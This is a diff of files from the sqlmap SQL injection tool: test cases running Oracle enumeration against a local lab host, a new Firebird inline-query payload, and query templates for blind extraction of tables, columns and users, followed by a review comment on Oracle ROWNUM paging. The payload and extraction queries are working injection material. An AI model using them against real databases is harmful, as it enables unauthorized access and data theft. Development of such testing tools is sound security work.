<tech value="B"/>
<search value="True"/>
<col value="surname,foobar"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - column without given db or table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<col value="surname,foobar"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - column without given db or table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<col value="surname,foobar"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - column given databases">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<db value="sys,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - column given databases">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<db value="sys,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - column given databases">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<db value="sys,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - column given tables">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<tbl value="users,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - column given tables">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<tbl value="users,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - column given tables">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<tbl value="users,foobar"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded search enumeration - column given databases and table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<search value="True"/>
<db value="sys,foobar"/>
<tbl value="users"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded search enumeration - column given databases and table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<search value="True"/>
<db value="sys,foobar"/>
<tbl value="users"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded search enumeration - column given databases and table">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<search value="True"/>
<db value="sys,foobar"/>
<tbl value="users"/>
<col value="surname"/>
<answers value="do you want to dump=N"/>
</switches>
<parse>
<item value="r'Database: SYS.+Table: USERS.+1 column.+SURNAME.+VARCHAR2'"/>
</parse>
</case>
<!-- TODO: add IBM DB2 test cases -->
<case name="SQLite multi-threaded search enumeration - database">
<switches>
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
@ -1845,6 +2359,73 @@
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded custom SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users WHERE ROWNUM=1.+1, luther, blisset'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded custom SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users WHERE ROWNUM=1 \[.+1.+luther'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded custom SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<query value="SELECT * FROM users WHERE ROWNUM=1"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users WHERE ROWNUM=1 \[1\].+1, luther, blisset'"/>
</parse>
</case>
<case name="Oracle boolean-based multi-threaded custom ordered SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="B"/>
<query value="SELECT * FROM users ORDER BY name"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>
<case name="Oracle error-based multi-threaded custom ordered SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="E"/>
<query value="SELECT * FROM users ORDER BY name"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>
<case name="Oracle UNION query multi-threaded custom ordered SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/oracle/get_int.php?id=1"/>
<threads value="4"/>
<tech value="U"/>
<query value="SELECT * FROM users ORDER BY name"/>
</switches>
<parse>
<item value="r'SELECT \* FROM users ORDER BY name \[5\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>
<!-- TODO: add IBM DB2 test cases -->
<case name="SQLite boolean-based multi-threaded custom SQL query enumeration">
<switches>
<url value="http://debiandev/sqlmap/sqlite/get_int.php?id=1"/>
@ -1886,7 +2467,6 @@
<query value="SELECT * FROM users ORDER BY name"/>
</switches>
<parse>
<!-- NOTE: it is not sorted on purpose because UNION does not play well with ORDER BY and it is stripped -->
<item value="r'SELECT \* FROM users ORDER BY name \[4\].+1, luther, blisset.+2, fluffy, bunny.+3, wu, ming'"/>
</parse>
</case>


@ -1996,6 +1996,24 @@ Formats:
<dbms>SQLite</dbms>
</details>
</test>
<test>
<title>Firebird inline queries</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>[QUERY]</vector>
<request>
<payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Firebird</dbms>
</details>
</test>
<!-- End of inline queries tests -->


@ -209,7 +209,7 @@
<length query="LENGTH(%s)"/>
<isnull query="NVL(%s,' ')"/>
<delimiter query="||"/>
<limit query="ROWNUM AS LIMIT %s ORDER BY 1 ASC) WHERE LIMIT"/>
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
<limitgroupstart/>
<limitgroupstop/>
@ -269,8 +269,8 @@
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'"/>
</tables>
<columns>
<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
<inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND OWNER='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'" condition="COLUMN_NAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
@ -359,12 +359,12 @@
<substring query="MID((%s),%d,%d)"/>
<concatenate query="%s&amp;%s"/>
<case query="SELECT (IIF(%s,1,0))"/>
<inference query="ASCW(MID((%s),%d,1)) > %d"/>
<banner/>
<!--CURRENTUSER() is not available outside the MS Access query tool itself-->
<current_user/>
<current_db/>
<hostname/>
<inference query="ASCW(MID((%s),%d,1)) > %d"/>
<is_dba/>
<dbs/>
<!--MSysObjects have no read permission by default-->
@ -401,16 +401,16 @@
<substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT IIF(%s,1,0)"/>
<inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version="&gt;=2.1" query2="SUBSTRING((%s) FROM %d FOR 1) > '%c'"/>
<banner query="SELECT RDB$GET_CONTEXT('SYSTEM','ENGINE_VERSION') FROM RDB$DATABASE" dbms_version="&gt;=2.1"/>
<current_user query="SELECT CURRENT_USER FROM RDB$DATABASE"/>
<current_db query="SELECT RDB$GET_CONTEXT('SYSTEM','DB_NAME') FROM RDB$DATABASE"/>
<hostname/>
<is_dba query="CURRENT_USER='SYSDBA'"/>
<users>
<inband query="SELECT RDB$USER FROM RDB$USER_PRIVILEGES"/>
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
</users>
<inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version="&gt;=2.1" query2="SUBSTRING((%s) FROM %d FOR 1) > '%c'"/>
<is_dba query="CURRENT_USER='SYSDBA'"/>
<tables>
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
<blind query="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
@ -603,8 +603,8 @@
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
</tables>
<columns>
<inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
<blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
<inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
<blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
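Review bot: The Oracle `<limit>` fragment in the first hunk (`ROWNUM AS LIMIT %s) WHERE LIMIT`) pages rows by ROWNUM over an unordered scan, and nothing in the hunk records that this only works if Oracle hands back rows in the same order on every request. Dropping `ORDER BY 1 ASC` is harmless in itself, because Oracle assigns ROWNUM before it evaluates an ORDER BY in the same query block, so the removed clause never changed which row `WHERE LIMIT=%d` selected; but the same fact means the row-at-a-time blind queries built on this pattern (e.g. `SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d`) can skip or repeat rows if the plan or buffer state changes between requests. A stable order needs the sort inside an inner subquery before ROWNUM is applied, `ROWNUM AS LIMIT FROM (SELECT ... ORDER BY 1)`, which the `limitregexp` on the following line appears to still match since it only anchors on `FROM … ) WHERE`. Until that is done, an XML comment above the limit line would stop someone re-adding the no-op clause: `<!-- ROWNUM is assigned before ORDER BY in the same block, so this fragment imposes no order; row N is the N-th row of whatever scan order Oracle chooses -->`.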